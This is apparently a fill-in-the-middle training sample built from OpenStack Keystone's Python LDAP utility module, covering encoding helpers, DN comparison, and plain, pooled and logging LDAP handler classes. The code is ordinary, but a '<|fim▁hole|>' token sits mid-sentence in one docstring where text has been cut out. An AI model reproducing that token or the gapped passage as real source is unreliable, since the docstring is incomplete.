'never': ldap.DEREF_NEVER,
'searching': ldap.DEREF_SEARCHING}
LDAP_TLS_CERTS = {'never': ldap.OPT_X_TLS_NEVER,
'demand': ldap.OPT_X_TLS_DEMAND,
'allow': ldap.OPT_X_TLS_ALLOW}
# RFC 4511 (The LDAP Protocol) defines a list containing only the OID '1.1' to
# indicate that no attributes should be returned besides the DN.
DN_ONLY = ['1.1']
_utf8_encoder = codecs.getencoder('utf-8')
def utf8_encode(value):
"""Encode a basestring to UTF-8.
If the string is unicode encode it to UTF-8, if the string is
str then assume it's already encoded. Otherwise raise a TypeError.
:param value: A basestring
:returns: UTF-8 encoded version of value
:raises: TypeError if value is not basestring
"""
if isinstance(value, six.text_type):
return _utf8_encoder(value)[0]
elif isinstance(value, six.binary_type):
return value
else:
raise TypeError("value must be basestring, "
"not %s" % value.__class__.__name__)
_utf8_decoder = codecs.getdecoder('utf-8')
def utf8_decode(value):
"""Decode a from UTF-8 into unicode.
If the value is a binary string assume it's UTF-8 encoded and decode
it into a unicode string. Otherwise convert the value from its
type into a unicode string.
:param value: value to be returned as unicode
:returns: value as unicode
:raises: UnicodeDecodeError for invalid UTF-8 encoding
"""
if isinstance(value, six.binary_type):
return _utf8_decoder(value)[0]
return six.text_type(value)
def py2ldap(val):
"""Type convert a Python value to a type accepted by LDAP (unicode).
The LDAP API only accepts strings for values therefore convert
the value's type to a unicode string. A subsequent type conversion
will encode the unicode as UTF-8 as required by the python-ldap API,
but for now we just want a string representation of the value.
:param val: The value to convert to a LDAP string representation
:returns: unicode string representation of value.
"""
if isinstance(val, bool):
return u'TRUE' if val else u'FALSE'
else:
return six.text_type(val)
def enabled2py(val):
"""Similar to ldap2py, only useful for the enabled attribute."""
try:
return LDAP_VALUES[val]
except KeyError:
pass
try:
return int(val)
except ValueError:
pass
return utf8_decode(val)
def ldap2py(val):
"""Convert an LDAP formatted value to Python type used by OpenStack.
Virtually all LDAP values are stored as UTF-8 encoded strings.
OpenStack prefers values which are unicode friendly.
:param val: LDAP formatted value
:returns: val converted to preferred Python type
"""
return utf8_decode(val)
def convert_ldap_result(ldap_result):
"""Convert LDAP search result to Python types used by OpenStack.
Each result tuple is of the form (dn, attrs), where dn is a string
containing the DN (distinguished name) of the entry, and attrs is
a dictionary containing the attributes associated with the
entry. The keys of attrs are strings, and the associated values
are lists of strings.
OpenStack wants to use Python types of its choosing. Strings will
be unicode, truth values boolean, whole numbers int's, etc. DN's will
also be decoded from UTF-8 to unicode.
:param ldap_result: LDAP search result
:returns: list of 2-tuples containing (dn, attrs) where dn is unicode
and attrs is a dict whose values are type converted to
OpenStack preferred types.
"""
py_result = []
at_least_one_referral = False
for dn, attrs in ldap_result:
ldap_attrs = {}
if dn is None:
# this is a Referral object, rather than an Entry object
at_least_one_referral = True
continue
for kind, values in six.iteritems(attrs):
try:
val2py = enabled2py if kind == 'enabled' else ldap2py
ldap_attrs[kind] = [val2py(x) for x in values]
except UnicodeDecodeError:
LOG.debug('Unable to decode value for attribute %s', kind)
py_result.append((utf8_decode(dn), ldap_attrs))
if at_least_one_referral:
LOG.debug(('Referrals were returned and ignored. Enable referral '
'chasing in keystone.conf via [ldap] chase_referrals'))
return py_result
def safe_iter(attrs):
if attrs is None:
return
elif isinstance(attrs, list):
for e in attrs:
yield e
else:
yield attrs
def parse_deref(opt):
try:
return LDAP_DEREF[opt]
except KeyError:
raise ValueError(_('Invalid LDAP deref option: %(option)s. '
'Choose one of: %(options)s') %
{'option': opt,
'options': ', '.join(LDAP_DEREF.keys()), })
def parse_tls_cert(opt):
try:
return LDAP_TLS_CERTS[opt]
except KeyError:
raise ValueError(_(
'Invalid LDAP TLS certs option: %(option)s. '
'Choose one of: %(options)s') % {
'option': opt,
'options': ', '.join(LDAP_TLS_CERTS.keys())})
def ldap_scope(scope):
try:
return LDAP_SCOPES[scope]
except KeyError:
raise ValueError(
_('Invalid LDAP scope: %(scope)s. Choose one of: %(options)s') % {
'scope': scope,
'options': ', '.join(LDAP_SCOPES.keys())})
def prep_case_insensitive(value):
"""Prepare a string for case-insensitive comparison.
This is defined in RFC4518. For simplicity, all this function does is
lowercase all the characters, strip leading and trailing whitespace,
and compress sequences of spaces to a single space.
"""
value = re.sub(r'\s+', ' ', value.strip().lower())
return value
def is_ava_value_equal(attribute_type, val1, val2):
"""Returns True if and only if the AVAs are equal.
When comparing AVAs, the equality matching rule for the attribute type
should be taken into consideration. For simplicity, this implementation
does a case-insensitive comparison.
Note that this function uses prep_case_insenstive so the limitations of
that function apply here.
"""
return prep_case_insensitive(val1) == prep_case_insensitive(val2)
def is_rdn_equal(rdn1, rdn2):
"""Returns True if and only if the RDNs are equal.
* RDNs must have the same number of AVAs.
* Each AVA of the RDNs must be the equal for the same attribute type. The
order isn't significant. Note that an attribute type will only be in one
AVA in an RDN, otherwise the DN wouldn't be valid.
* Attribute types aren't case sensitive. Note that attribute type
comparison is more complicated than implemented. This function only
compares case-insentive. The code should handle multiple names for an
attribute type (e.g., cn, commonName, and 2.5.4.3 are the same).
Note that this function uses is_ava_value_equal to compare AVAs so the
limitations of that function apply here.
"""
if len(rdn1) != len(rdn2):
return False
for attr_type_1, val1, dummy in rdn1:
found = False
for attr_type_2, val2, dummy in rdn2:
if attr_type_1.lower() != attr_type_2.lower():
continue
found = True
if not is_ava_value_equal(attr_type_1, val1, val2):
return False
break
if not found:
return False
return True
def is_dn_equal(dn1, dn2):
"""Returns True if and only if the DNs are equal.
Two DNs are equal if they've got the same number of RDNs and if the RDNs
are the same at each position. See RFC4517.
Note that this function uses is_rdn_equal to compare RDNs so the
limitations of that function apply here.
:param dn1: Either a string DN or a DN parsed by ldap.dn.str2dn.
:param dn2: Either a string DN or a DN parsed by ldap.dn.str2dn.
"""
if not isinstance(dn1, list):
dn1 = ldap.dn.str2dn(utf8_encode(dn1))
if not isinstance(dn2, list):
dn2 = ldap.dn.str2dn(utf8_encode(dn2))
if len(dn1) != len(dn2):
return False
for rdn1, rdn2 in zip(dn1, dn2):
if not is_rdn_equal(rdn1, rdn2):
return False
return True
def dn_startswith(descendant_dn, dn):
"""Returns True if and only if the descendant_dn is under the dn.
:param descendant_dn: Either a string DN or a DN parsed by ldap.dn.str2dn.
:param dn: Either a string DN or a DN parsed by ldap.dn.str2dn.
"""
if not isinstance(descendant_dn, list):
descendant_dn = ldap.dn.str2dn(utf8_encode(descendant_dn))
if not isinstance(dn, list):
dn = ldap.dn.str2dn(utf8_encode(dn))
if len(descendant_dn) <= len(dn):
return False
# Use the last len(dn) RDNs.
return is_dn_equal(descendant_dn[-len(dn):], dn)
@six.add_metaclass(abc.ABCMeta)
class LDAPHandler(object):
'''Abstract class which defines methods for a LDAP API provider.
Native Keystone values cannot be passed directly into and from the
python-ldap API. Type conversion must occur at the LDAP API
boudary, examples of type conversions are:
* booleans map to the strings 'TRUE' and 'FALSE'
* integer values map to their string representation.
* unicode strings are encoded in UTF-8
In addition to handling type conversions at the API boundary we
have the requirement to support more than one LDAP API
provider. Currently we have:
* python-ldap, this is the standard LDAP API for Python, it
requires access to a live LDAP server.
* Fake LDAP which emulates python-ldap. This is used for
testing without requiring a live LDAP server.
To support these requirements we need a layer that performs type
conversions and then calls another LDAP API which is configurable
(e.g. either python-ldap or the fake emulation).
We have an additional constraint at the time of this writing due to
limitations in the logging module. The logging module is not
capable of accepting UTF-8 encoded strings, it will throw an
encoding exception. Therefore all logging MUST be performed prior
to UTF-8 conversion. This means no logging can be performed in the
ldap APIs that implement the python-ldap API because those APIs
are defined to accept only UTF-8 strings. Thus the layer which
performs type conversions must also do the logging. We do the type
conversions in two steps, once to convert all Python types to
unicode strings, then log, then convert the unicode strings to
UTF-8.
There are a variety of ways one could accomplish this, we elect to
use a chaining technique whereby instances of this class simply
call the next member in the chain via the "conn" attribute. The
chain is constructed by passing in an existing instance of this
class as the conn attribute when the class is instantiated.
Here is a brief explanation of why other possible approaches were
not used:
subclassing
To perform the wrapping operations in the correct order
the type convesion class would have to subclass each of
the API providers. This is awkward, doubles the number of
classes, and does not scale well. It requires the type
conversion class to be aware of all possible API
providers.
decorators
Decorators provide an elegant solution to wrap methods and
would be an ideal way to perform type conversions before
calling the wrapped function and then converting the
values returned from the wrapped function. However
decorators need to be aware of the method signature, it
has to know what input parameters need conversion and how
to convert the result. For an API like python-ldap which
has a large number of different method signatures it would
require a large number of specialized<|fim▁hole|> the wrong decorator due to the inherent complexity and
tendency to cut-n-paste code. Another option is to
parameterize the decorator to make it "smart". Experience
has shown such decorators become insanely complicated and
difficult to understand and debug. Also decorators tend to
hide what's really going on when a method is called, the
operations being performed are not visible when looking at
the implemation of a decorated method, this too experience
has shown leads to mistakes.
Chaining simplifies both wrapping to perform type conversion as
well as the substitution of alternative API providers. One simply
creates a new instance of the API interface and insert it at the
front of the chain. Type conversions are explicit and obvious.
If a new method needs to be added to the API interface one adds it
to the abstract class definition. Should one miss adding the new
method to any derivations of the abstract class the code will fail
to load and run making it impossible to forget updating all the
derived classes.
'''
@abc.abstractmethod
def __init__(self, conn=None):
self.conn = conn
@abc.abstractmethod
def connect(self, url, page_size=0, alias_dereferencing=None,
use_tls=False, tls_cacertfile=None, tls_cacertdir=None,
tls_req_cert='demand', chase_referrals=None, debug_level=None,
use_pool=None, pool_size=None, pool_retry_max=None,
pool_retry_delay=None, pool_conn_timeout=None,
pool_conn_lifetime=None):
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def set_option(self, option, invalue):
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def get_option(self, option):
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def simple_bind_s(self, who='', cred='',
serverctrls=None, clientctrls=None):
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def unbind_s(self):
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def add_s(self, dn, modlist):
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def search_s(self, base, scope,
filterstr='(objectClass=*)', attrlist=None, attrsonly=0):
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def search_ext(self, base, scope,
filterstr='(objectClass=*)', attrlist=None, attrsonly=0,
serverctrls=None, clientctrls=None,
timeout=-1, sizelimit=0):
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def result3(self, msgid=ldap.RES_ANY, all=1, timeout=None,
resp_ctrl_classes=None):
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def modify_s(self, dn, modlist):
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def delete_s(self, dn):
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def delete_ext_s(self, dn, serverctrls=None, clientctrls=None):
raise exception.NotImplemented() # pragma: no cover
class PythonLDAPHandler(LDAPHandler):
'''Implementation of the LDAPHandler interface which calls the
python-ldap API.
Note, the python-ldap API requires all string values to be UTF-8
encoded. The KeystoneLDAPHandler enforces this prior to invoking
the methods in this class.
'''
def __init__(self, conn=None):
super(PythonLDAPHandler, self).__init__(conn=conn)
def connect(self, url, page_size=0, alias_dereferencing=None,
use_tls=False, tls_cacertfile=None, tls_cacertdir=None,
tls_req_cert='demand', chase_referrals=None, debug_level=None,
use_pool=None, pool_size=None, pool_retry_max=None,
pool_retry_delay=None, pool_conn_timeout=None,
pool_conn_lifetime=None):
_common_ldap_initialization(url=url,
use_tls=use_tls,
tls_cacertfile=tls_cacertfile,
tls_cacertdir=tls_cacertdir,
tls_req_cert=tls_req_cert,
debug_level=debug_level)
self.conn = ldap.initialize(url)
self.conn.protocol_version = ldap.VERSION3
if alias_dereferencing is not None:
self.conn.set_option(ldap.OPT_DEREF, alias_dereferencing)
self.page_size = page_size
if use_tls:
self.conn.start_tls_s()
if chase_referrals is not None:
self.conn.set_option(ldap.OPT_REFERRALS, int(chase_referrals))
def set_option(self, option, invalue):
return self.conn.set_option(option, invalue)
def get_option(self, option):
return self.conn.get_option(option)
def simple_bind_s(self, who='', cred='',
serverctrls=None, clientctrls=None):
return self.conn.simple_bind_s(who, cred, serverctrls, clientctrls)
def unbind_s(self):
return self.conn.unbind_s()
def add_s(self, dn, modlist):
return self.conn.add_s(dn, modlist)
def search_s(self, base, scope,
filterstr='(objectClass=*)', attrlist=None, attrsonly=0):
return self.conn.search_s(base, scope, filterstr,
attrlist, attrsonly)
def search_ext(self, base, scope,
filterstr='(objectClass=*)', attrlist=None, attrsonly=0,
serverctrls=None, clientctrls=None,
timeout=-1, sizelimit=0):
return self.conn.search_ext(base, scope,
filterstr, attrlist, attrsonly,
serverctrls, clientctrls,
timeout, sizelimit)
def result3(self, msgid=ldap.RES_ANY, all=1, timeout=None,
resp_ctrl_classes=None):
# The resp_ctrl_classes parameter is a recent addition to the
# API. It defaults to None. We do not anticipate using it.
# To run with older versions of python-ldap we do not pass it.
return self.conn.result3(msgid, all, timeout)
def modify_s(self, dn, modlist):
return self.conn.modify_s(dn, modlist)
def delete_s(self, dn):
return self.conn.delete_s(dn)
def delete_ext_s(self, dn, serverctrls=None, clientctrls=None):
return self.conn.delete_ext_s(dn, serverctrls, clientctrls)
def _common_ldap_initialization(url, use_tls=False, tls_cacertfile=None,
tls_cacertdir=None, tls_req_cert=None,
debug_level=None):
'''Method for common ldap initialization between PythonLDAPHandler and
PooledLDAPHandler.
'''
LOG.debug("LDAP init: url=%s", url)
LOG.debug('LDAP init: use_tls=%s tls_cacertfile=%s tls_cacertdir=%s '
'tls_req_cert=%s tls_avail=%s',
use_tls, tls_cacertfile, tls_cacertdir,
tls_req_cert, ldap.TLS_AVAIL)
if debug_level is not None:
ldap.set_option(ldap.OPT_DEBUG_LEVEL, debug_level)
using_ldaps = url.lower().startswith("ldaps")
if use_tls and using_ldaps:
raise AssertionError(_('Invalid TLS / LDAPS combination'))
# The certificate trust options apply for both LDAPS and TLS.
if use_tls or using_ldaps:
if not ldap.TLS_AVAIL:
raise ValueError(_('Invalid LDAP TLS_AVAIL option: %s. TLS '
'not available') % ldap.TLS_AVAIL)
if tls_cacertfile:
# NOTE(topol)
# python ldap TLS does not verify CACERTFILE or CACERTDIR
# so we add some extra simple sanity check verification
# Also, setting these values globally (i.e. on the ldap object)
# works but these values are ignored when setting them on the
# connection
if not os.path.isfile(tls_cacertfile):
raise IOError(_("tls_cacertfile %s not found "
"or is not a file") %
tls_cacertfile)
ldap.set_option(ldap.OPT_X_TLS_CACERTFILE, tls_cacertfile)
elif tls_cacertdir:
# NOTE(topol)
# python ldap TLS does not verify CACERTFILE or CACERTDIR
# so we add some extra simple sanity check verification
# Also, setting these values globally (i.e. on the ldap object)
# works but these values are ignored when setting them on the
# connection
if not os.path.isdir(tls_cacertdir):
raise IOError(_("tls_cacertdir %s not found "
"or is not a directory") %
tls_cacertdir)
ldap.set_option(ldap.OPT_X_TLS_CACERTDIR, tls_cacertdir)
if tls_req_cert in LDAP_TLS_CERTS.values():
ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, tls_req_cert)
else:
LOG.debug("LDAP TLS: invalid TLS_REQUIRE_CERT Option=%s",
tls_req_cert)
class MsgId(list):
'''Wrapper class to hold connection and msgid.'''
pass
def use_conn_pool(func):
'''Use this only for connection pool specific ldap API.
This adds connection object to decorated API as next argument after self.
'''
def wrapper(self, *args, **kwargs):
# assert isinstance(self, PooledLDAPHandler)
with self._get_pool_connection() as conn:
self._apply_options(conn)
return func(self, conn, *args, **kwargs)
return wrapper
class PooledLDAPHandler(LDAPHandler):
'''Implementation of the LDAPHandler interface which uses pooled
connection manager.
Pool specific configuration is defined in [ldap] section.
All other LDAP configuration is still used from [ldap] section
Keystone LDAP authentication logic authenticates an end user using its DN
and password via LDAP bind to establish supplied password is correct.
This can fill up the pool quickly (as pool re-uses existing connection
based on its bind data) and would not leave space in pool for connection
re-use for other LDAP operations.
Now a separate pool can be established for those requests when related flag
'use_auth_pool' is enabled. That pool can have its own size and
connection lifetime. Other pool attributes are shared between those pools.
If 'use_pool' is disabled, then 'use_auth_pool' does not matter.
If 'use_auth_pool' is not enabled, then connection pooling is not used for
those LDAP operations.
Note, the python-ldap API requires all string values to be UTF-8
encoded. The KeystoneLDAPHandler enforces this prior to invoking
the methods in this class.
'''
# Added here to allow override for testing
Connector = ldappool.StateConnector
auth_pool_prefix = 'auth_pool_'
connection_pools = {} # static connector pool dict
def __init__(self, conn=None, use_auth_pool=False):
super(PooledLDAPHandler, self).__init__(conn=conn)
self.who = ''
self.cred = ''
self.conn_options = {} # connection specific options
self.page_size = None
self.use_auth_pool = use_auth_pool
self.conn_pool = None
def connect(self, url, page_size=0, alias_dereferencing=None,
use_tls=False, tls_cacertfile=None, tls_cacertdir=None,
tls_req_cert='demand', chase_referrals=None, debug_level=None,
use_pool=None, pool_size=None, pool_retry_max=None,
pool_retry_delay=None, pool_conn_timeout=None,
pool_conn_lifetime=None):
_common_ldap_initialization(url=url,
use_tls=use_tls,
tls_cacertfile=tls_cacertfile,
tls_cacertdir=tls_cacertdir,
tls_req_cert=tls_req_cert,
debug_level=debug_level)
self.page_size = page_size
# Following two options are not added in common initialization as they
# need to follow a sequence in PythonLDAPHandler code.
if alias_dereferencing is not None:
self.set_option(ldap.OPT_DEREF, alias_dereferencing)
if chase_referrals is not None:
self.set_option(ldap.OPT_REFERRALS, int(chase_referrals))
if self.use_auth_pool: # separate pool when use_auth_pool enabled
pool_url = self.auth_pool_prefix + url
else:
pool_url = url
try:
self.conn_pool = self.connection_pools[pool_url]
except KeyError:
self.conn_pool = ldappool.ConnectionManager(
url,
size=pool_size,
retry_max=pool_retry_max,
retry_delay=pool_retry_delay,
timeout=pool_conn_timeout,
connector_cls=self.Connector,
use_tls=use_tls,
max_lifetime=pool_conn_lifetime)
self.connection_pools[pool_url] = self.conn_pool
def set_option(self, option, invalue):
self.conn_options[option] = invalue
def get_option(self, option):
value = self.conn_options.get(option)
# if option was not specified explicitly, then use connection default
# value for that option if there.
if value is None:
with self._get_pool_connection() as conn:
value = conn.get_option(option)
return value
def _apply_options(self, conn):
# if connection has a lifetime, then it already has options specified
if conn.get_lifetime() > 30:
return
for option, invalue in six.iteritems(self.conn_options):
conn.set_option(option, invalue)
def _get_pool_connection(self):
return self.conn_pool.connection(self.who, self.cred)
def simple_bind_s(self, who='', cred='',
serverctrls=None, clientctrls=None):
'''Not using use_conn_pool decorator here as this API takes cred as
input.
'''
self.who = who
self.cred = cred
with self._get_pool_connection() as conn:
self._apply_options(conn)
def unbind_s(self):
# After connection generator is done `with` statement execution block
# connection is always released via finally block in ldappool.
# So this unbind is a no op.
pass
@use_conn_pool
def add_s(self, conn, dn, modlist):
return conn.add_s(dn, modlist)
@use_conn_pool
def search_s(self, conn, base, scope,
filterstr='(objectClass=*)', attrlist=None, attrsonly=0):
return conn.search_s(base, scope, filterstr, attrlist,
attrsonly)
def search_ext(self, base, scope,
filterstr='(objectClass=*)', attrlist=None, attrsonly=0,
serverctrls=None, clientctrls=None,
timeout=-1, sizelimit=0):
'''This API is asynchoronus API which returns MsgId instance to be used
in result3 call.
To work with result3 API in predicatable manner, same LDAP connection
is needed which provided msgid. So wrapping used connection and msgid
in MsgId class. The connection associated with search_ext is released
once last hard reference to MsgId object is freed. This will happen
when the method is done with returned MsgId usage.
'''
conn_ctxt = self._get_pool_connection()
conn = conn_ctxt.__enter__()
try:
msgid = conn.search_ext(base, scope,
filterstr, attrlist, attrsonly,
serverctrls, clientctrls,
timeout, sizelimit)
except Exception:
conn_ctxt.__exit__(*sys.exc_info())
raise
res = MsgId((conn, msgid))
weakref.ref(res, functools.partial(conn_ctxt.__exit__,
None, None, None))
return res
def result3(self, msgid, all=1, timeout=None,
resp_ctrl_classes=None):
'''This method is used to wait for and return the result of an
operation previously initiated by one of the LDAP asynchronous
operation routines (eg search_ext()) It returned an invocation
identifier (a message id) upon successful initiation of their
operation.
Input msgid is expected to be instance of class MsgId which has LDAP
session/connection used to execute search_ext and message idenfier.
The connection associated with search_ext is released once last hard
reference to MsgId object is freed. This will happen when function
which requested msgId and used it in result3 exits.
'''
conn, msg_id = msgid
return conn.result3(msg_id, all, timeout)
@use_conn_pool
def modify_s(self, conn, dn, modlist):
return conn.modify_s(dn, modlist)
@use_conn_pool
def delete_s(self, conn, dn):
return conn.delete_s(dn)
@use_conn_pool
def delete_ext_s(self, conn, dn, serverctrls=None, clientctrls=None):
return conn.delete_ext_s(dn, serverctrls, clientctrls)
class KeystoneLDAPHandler(LDAPHandler):
'''Convert data types and perform logging.
This LDAP inteface wraps the python-ldap based interfaces. The
python-ldap interfaces require string values encoded in UTF-8. The
OpenStack logging framework at the time of this writing is not
capable of accepting strings encoded in UTF-8, the log functions
will throw decoding errors if a non-ascii character appears in a
string.
Prior to the call Python data types are converted to a string
representation as required by the LDAP APIs.
Then logging is performed so we can track what is being
sent/received from LDAP. Also the logging filters security
sensitive items (i.e. passwords).
Then the string values are encoded into UTF-8.
Then the LDAP API entry point is invoked.
Data returned from the LDAP call is converted back from UTF-8
encoded strings into the Python data type used internally in
OpenStack.
'''
def __init__(self, conn=None):
super(KeystoneLDAPHandler, self).__init__(conn=conn)
self.page_size = 0
def __enter__(self):
return self
def _disable_paging(self):
# Disable the pagination from now on
self.page_size = 0
def connect(self, url, page_size=0, alias_dereferencing=None,
use_tls=False, tls_cacertfile=None, tls_cacertdir=None,
tls_req_cert='demand', chase_referrals=None, debug_level=None,
use_pool=None, pool_size=None,
pool_retry_max=None, pool_retry_delay=None,
pool_conn_timeout=None, pool_conn_lifetime=None):
self.page_size = page_size
return self.conn.connect(url, page_size, alias_dereferencing,
use_tls, tls_cacertfile, tls_cacertdir,
tls_req_cert, chase_referrals,
debug_level=debug_level,
use_pool=use_pool,
pool_size=pool_size,
pool_retry_max=pool_retry_max,
pool_retry_delay=pool_retry_delay,
pool_conn_timeout=pool_conn_timeout,
pool_conn_lifetime=pool_conn_lifetime)
def set_option(self, option, invalue):
return self.conn.set_option(option, invalue)
def get_option(self, option):
return self.conn.get_option(option)
def simple_bind_s(self, who='', cred='',
serverctrls=None, clientctrls=None):
LOG.debug("LDAP bind: who=%s", who)
who_utf8 = utf8_encode(who)
cred_utf8 = utf8_encode(cred)
return self.conn.simple_bind_s(who_utf8, cred_utf8,
serverctrls=serverctrls,
clientctrls=clientctrls)
def unbind_s(self):
LOG.debug("LDAP unbind")
return self.conn.unbind_s()
def add_s(self, dn, modlist):
ldap_attrs = [(kind, [py2ldap(x) for x in safe_iter(values)])
for kind, values in modlist]
logging_attrs = [(kind, values
if kind != 'userPassword'
else ['****'])
for kind, values in ldap_attrs]
LOG.debug('LDAP add: dn=%s attrs=%s',
dn, logging_attrs)
dn_utf8 = utf8_encode(dn)
ldap_attrs_utf8 = [(kind, [utf8_encode(x) for x in safe_iter(values)])
for kind, values in ldap_attrs]
return self.conn.add_s(dn_utf8, ldap_attrs_utf8)
def search_s(self, base, scope,
filterstr='(objectClass=*)', attrlist=None, attrsonly=0):
# NOTE(morganfainberg): Remove "None" singletons from this list, which
# allows us to set mapped attributes to "None" as defaults in config.
# Without this filtering, the ldap query would raise a TypeError since
# attrlist is expected to be an iterable of strings.
if attrlist is not None:
attrlist = [attr for attr in attrlist if attr is not None]
LOG.debug('LDAP search: base=%s scope=%s filterstr=%s '
'attrs=%s attrsonly=%s',
base, scope, filterstr, attrlist, attrsonly)
if self.page_size:
ldap_result = self._paged_search_s(base, scope,
filterstr, attrlist)
else:
base_utf8 = utf8_encode(base)
filterstr_utf8 = utf8_encode(filterstr)
if attrlist is None:
attrlist_utf8 = None
else:
attrlist_utf8 = map(utf8_encode, attrlist)
ldap_result = self.conn.search_s(base_utf8, scope,
filterstr_utf8,
attrlist_utf8, attrsonly)
py_result = convert_ldap_result(ldap_result)
return py_result
def search_ext(self, base, scope,
filterstr='(objectClass=*)', attrlist=None, attrsonly=0,
serverctrls=None, clientctrls=None,
timeout=-1, sizelimit=0):
if attrlist is not None:
attrlist = [attr for attr in attrlist if attr is not None]
LOG.debug('LDAP search_ext: base=%s scope=%s filterstr=%s '
'attrs=%s attrsonly=%s'
'serverctrls=%s clientctrls=%s timeout=%s sizelimit=%s',
base, scope, filterstr, attrlist, attrsonly,
serverctrls, clientctrls, timeout, sizelimit)
return self.conn.search_ext(base, scope,
filterstr, attrlist, attrsonly,
serverctrls, clientctrls,
timeout, sizelimit)
def _paged_search_s(self, base, scope, filterstr, attrlist=None):
res = []
use_old_paging_api = False
# The API for the simple paged results control changed between
# python-ldap 2.3 and 2.4. We need to detect the capabilities
# of the python-ldap version we are using.
if hasattr(ldap, 'LDAP_CONTROL_PAGE_OID'):
use_old_paging_api = True
lc = ldap.controls.SimplePagedResultsControl(
controlType=ldap.LDAP_CONTROL_PAGE_OID,
criticality=True,
controlValue=(self.page_size, ''))
page_ctrl_oid = ldap.LDAP_CONTROL_PAGE_OID
else:
lc = ldap.controls.libldap.SimplePagedResultsControl(
criticality=True,
size=self.page_size,
cookie='')
page_ctrl_oid = ldap.controls.SimplePagedResultsControl.controlType
base_utf8 = utf8_encode(base)
filterstr_utf8 = utf8_encode(filterstr)
if attrlist is None:
attrlist_utf8 = None
else:
attrlist = [attr for attr in attrlist if attr is not None]
attrlist_utf8 = map(utf8_encode, attrlist)
msgid = self.conn.search_ext(base_utf8,
scope,
filterstr_utf8,
attrlist_utf8,
serverctrls=[lc])
# Endless loop request pages on ldap server until it has no data
while True:
# Request to the ldap server a page with 'page_size' entries
rtype, rdata, rmsgid, serverctrls = self.conn.result3(msgid)
# Receive the data
res.extend(rdata)
pctrls = [c for c in serverctrls
if c.controlType == page_ctrl_oid]
if pctrls:
# LDAP server supports pagination
if use_old_paging_api:
est, cookie = pctrls[0].controlValue
lc.controlValue = (self.page_size, cookie)
else:
cookie = lc.cookie = pctrls[0].cookie
if cookie:
# There is more data still on the server
# so we request another page
msgid = self.conn.search_ext(base_utf8,
scope,
filterstr_utf8,
attrlist_utf8,
serverctrls=[lc])
else:
# Exit condition no more data on server
break
else:
LOG.warning(_LW('LDAP Server does not support paging. '
'Disable paging in keystone.conf to '
'avoid this message.'))
self._disable_paging()
break
return res
def result3(self, msgid=ldap.RES_ANY, all=1, timeout=None,
resp_ctrl_classes=None):
ldap_result = self.conn.result3(msgid, all, timeout, resp_ctrl_classes)
LOG.debug('LDAP result3: msgid=%s all=%s timeout=%s '
'resp_ctrl_classes=%s ldap_result=%s',
msgid, all, timeout, resp_ctrl_classes, ldap_result)
py_result = convert_ldap_result(ldap_result)
return py_result
def modify_s(self, dn, modlist):
ldap_modlist = [
(op, kind, (None if values is None
else [py2ldap(x) for x in safe_iter(values)]))
for op, kind, values in modlist]
logging_modlist = [(op, kind, (values if kind != 'userPassword'
else ['****']))
for op, kind, values in ldap_modlist]
LOG.debug('LDAP modify: dn=%s modlist=%s',
dn, logging_modlist)
dn_utf8 = utf8_encode(dn)
ldap_modlist_utf8 = [
(op, kind, (None if values is None
else [utf8_encode(x) for x in safe_iter(values)]))
for op, kind, values in ldap_modlist]
return self.conn.modify_s(dn_utf8, ldap_modlist_utf8)
def delete_s(self, dn):
LOG.debug("LDAP delete: dn=%s", dn)
dn_utf8 = utf8_encode(dn)
return self.conn.delete_s(dn_utf8)
def delete_ext_s(self, dn, serverctrls=None, clientctrls=None):
LOG.debug('LDAP delete_ext: dn=%s serverctrls=%s clientctrls=%s',
dn, serverctrls, clientctrls)
dn_utf8 = utf8_encode(dn)
return self.conn.delete_ext_s(dn_utf8, serverctrls, clientctrls)
def __exit__(self, exc_type, exc_val, exc_tb):
self.unbind_s()
_HANDLERS = {}
def register_handler(prefix, handler):
_HANDLERS[prefix] = handler
def _get_connection(conn_url, use_pool=False, use_auth_pool=False):
for prefix, handler in six.iteritems(_HANDLERS):
if conn_url.startswith(prefix):
return handler()
if use_pool:
return PooledLDAPHandler(use_auth_pool=use_auth_pool)
else:
return PythonLDAPHandler()
def filter_entity(entity_ref):
"""Filter out private items in an entity dict.
:param entity_ref: the entity dictionary. The 'dn' field will be removed.
'dn' is used in LDAP, but should not be returned to the user. This
value may be modified.
:returns: entity_ref
"""
if entity_ref:
entity_ref.pop('dn', None)
return entity_ref
class BaseLdap(object):
DEFAULT_SUFFIX = "dc=example,dc=com"
DEFAULT_OU = None
DEFAULT_STRUCTURAL_CLASSES = None
DEFAULT_ID_ATTR = 'cn'
DEFAULT_OBJECTCLASS = None
DEFAULT_FILTER = None
DEFAULT_EXTRA_ATTR_MAPPING = []
DUMB_MEMBER_DN = 'cn=dumb,dc=nonexistent'
NotFound = None
notfound_arg = None
options_name = None
model = None
attribute_options_names = {}
immutable_attrs = []
attribute_ignore = []
tree_dn = None
def __init__(self, conf):
self.LDAP_URL = conf.ldap.url
self.LDAP_USER = conf.ldap.user
self.LDAP_PASSWORD = conf.ldap.password
self.LDAP_SCOPE = ldap_scope(conf.ldap.query_scope)
self.alias_dereferencing = parse_deref(conf.ldap.alias_dereferencing)
self.page_size = conf.ldap.page_size
self.use_tls = conf.ldap.use_tls
self.tls_cacertfile = conf.ldap.tls_cacertfile
self.tls_cacertdir = conf.ldap.tls_cacertdir
self.tls_req_cert = parse_tls_cert(conf.ldap.tls_req_cert)
self.attribute_mapping = {}
self.chase_referrals = conf.ldap.chase_referrals
self.debug_level = conf.ldap.debug_level
# LDAP Pool specific attribute
self.use_pool = conf.ldap.use_pool
self.pool_size = conf.ldap.pool_size
self.pool_retry_max = conf.ldap.pool_retry_max
self.pool_retry_delay = conf.ldap.pool_retry_delay
self.pool_conn_timeout = conf.ldap.pool_connection_timeout
self.pool_conn_lifetime = conf.ldap.pool_connection_lifetime
# End user authentication pool specific config attributes
self.use_auth_pool = self.use_pool and conf.ldap.use_auth_pool
self.auth_pool_size = conf.ldap.auth_pool_size
